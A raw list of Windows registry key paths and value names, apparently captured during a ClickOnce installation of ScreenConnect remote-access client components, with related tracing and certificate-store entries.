HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C
Blob
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{60051b8f-4f12-400a-8e50-dd05ebd438d1}
NonCanonicalData
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{60051b8f-4f12-400a-8e50-dd05ebd438d1}\scre..tion_25b0fbb6ef7eb094_0018.0002_12d9d3044e990931
appid
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{60051b8f-4f12-400a-8e50-dd05ebd438d1}\scre..tion_25b0fbb6ef7eb094_0018.0002_12d9d3044e990931
{c989bb7a-8385-4715-98cf-a741a8edb823}!ApplicationTrust
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b
lock!0100000063f2bd0ae41d00002c1e000000000000000000001ab8ebd99a28db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}
NonCanonicalData
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42
appid
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!DeploymentSourceUri
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!ApplicationSourceUri
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!IsFullTrust
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
appid
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!IsShellVisible
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!PreviousBind
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!PendingBind
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!ExcludedDeployment
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!PendingDeployment
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!DeploymentProviderUri
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!MinimumRequiredVersion
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!LastCheckTime
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!UpdateSkippedDeployment
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!UpdateSkipTime
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!AppType
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!CurrentBind
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_12d9d3044e990931
appid
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_12d9d3044e990931
pin!S_{3f471841-eef2-47d6-89c0-d028f03a4ad5}
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42
appid
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42
implication!scre..tion_25b0fbb6ef7eb094_0018.0002_12d9d3044e990931
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c
implication!scre..tion_25b0fbb6ef7eb094_0018.0002_12d9d3044e990931
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea
implication!scre..tion_25b0fbb6ef7eb094_0018.0002_12d9d3044e990931
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af
implication!scre..tion_25b0fbb6ef7eb094_0018.0002_12d9d3044e990931
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883
implication!scre..tion_25b0fbb6ef7eb094_0018.0002_12d9d3044e990931
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b
implication!scre..tion_25b0fbb6ef7eb094_0018.0002_12d9d3044e990931
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_none_394ffef6a8000aee
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_none_394ffef6a8000aee
implication!scre..tion_25b0fbb6ef7eb094_0018.0002_12d9d3044e990931
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_none_394ffef6a8000aee
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_none_394ffef6a8000aee
SizeOfStronglyNamedComponent
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b
SizeOfStronglyNamedComponent
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b
DigestValue
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b
Transform
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b
DigestMethod
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_12d9d3044e990931\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\Files
ScreenConnect.ClientService.exe_e781b1ee36f7c0e0
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\Files
ScreenConnect.ClientService.exe_e781b1ee36f7c0e0
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_12d9d3044e990931\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\Files
ScreenConnect.WindowsBackstageShell.exe_898f6d085da479bc
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_12d9d3044e990931\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\Files
ScreenConnect.WindowsFileManager.exe.config_ceab8affc7343daa
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\Files
ScreenConnect.WindowsFileManager.exe.config_ceab8affc7343daa
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_12d9d3044e990931\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\Files
ScreenConnect.WindowsClient.exe.config_f7f106a5cc529540
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\Files
ScreenConnect.WindowsClient.exe.config_f7f106a5cc529540
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_12d9d3044e990931\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\Files
ScreenConnect.WindowsBackstageShell.exe.config_61230ac9d37a71e2
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_12d9d3044e990931\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\Files
ScreenConnect.WindowsFileManager.exe_0e21f87bfcff26be
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\Files
ScreenConnect.WindowsFileManager.exe_0e21f87bfcff26be
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883
SizeOfStronglyNamedComponent
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883
DigestValue
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883
Transform
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883
DigestMethod
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883\Files
ScreenConnect.Client.dll_fc1d7bd48553fcab
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883\Files
ScreenConnect.Client.dll_fc1d7bd48553fcab
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af
SizeOfStronglyNamedComponent
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af
DigestValue
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af
Transform
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af
DigestMethod
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af\Files
ScreenConnect.Windows.dll_fc0d83aff7df0b5b
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af\Files
ScreenConnect.Windows.dll_fc0d83aff7df0b5b
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea
SizeOfStronglyNamedComponent
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea
DigestValue
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea
DigestMethod
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea\Files
ScreenConnect.ClientService.dll_e781b1c636f7bfae
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea\Files
ScreenConnect.ClientService.dll_e781b1c636f7bfae
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f
SizeOfStronglyNamedComponent
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f
DigestValue
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f\Files
ScreenConnect.Core.dll_b96889d378047e27
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f\Files
ScreenConnect.Core.dll_b96889d378047e27
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c
SizeOfStronglyNamedComponent
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c
DigestValue
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\Files
ScreenConnect.WindowsClient.exe_6492277df2db17d2
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\Files
ScreenConnect.WindowsClient.exe_6492277df2db17d2
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment
OnlineAppQuotaUsageEstimate
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f
lock!10000000f35ee00ae41d00002c1e00000000000000000000ab65a21aa028db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c
lock!0e000000f35ee00ae41d00002c1e00000000000000000000ab65a21aa028db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea
lock!0c000000f35ee00ae41d00002c1e00000000000000000000ab65a21aa028db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af
lock!0a000000f35ee00ae41d00002c1e00000000000000000000ab65a21aa028db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883
lock!08000000f35ee00ae41d00002c1e00000000000000000000ab65a21aa028db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b
lock!06000000f35ee00ae41d00002c1e00000000000000000000ab65a21aa028db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_none_394ffef6a8000aee
lock!04000000f35ee00ae41d00002c1e00000000000000000000ab65a21aa028db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Applications\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Applications\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42
PreparedForExecution
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42
lock!11000000025fe00ae41d00002c1e00000000000000000000fdc1a41aa028db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\Files
ScreenConnect.ClientService.exe_5e8c1e841cd8db20
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\Files
ScreenConnect.WindowsBackstageShell.exe_89b7a517a15abfdc
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\Files
ScreenConnect.WindowsFileManager.exe.config_5db10293a642be8a
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\Files
ScreenConnect.WindowsClient.exe.config_432322067acab5c0
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\Files
ScreenConnect.WindowsBackstageShell.exe.config_bc78256f1e952942
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\Files
ScreenConnect.WindowsFileManager.exe_74b82db4db38179e
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea\Files
ScreenConnect.ClientService.dll_5e8c1e5c1cd8d9ee
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\Files
ScreenConnect.WindowsClient.exe_fd0fcfe1fd1a6cd2
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f\Files
ScreenConnect.Core.dll_963930cc5ced28c7
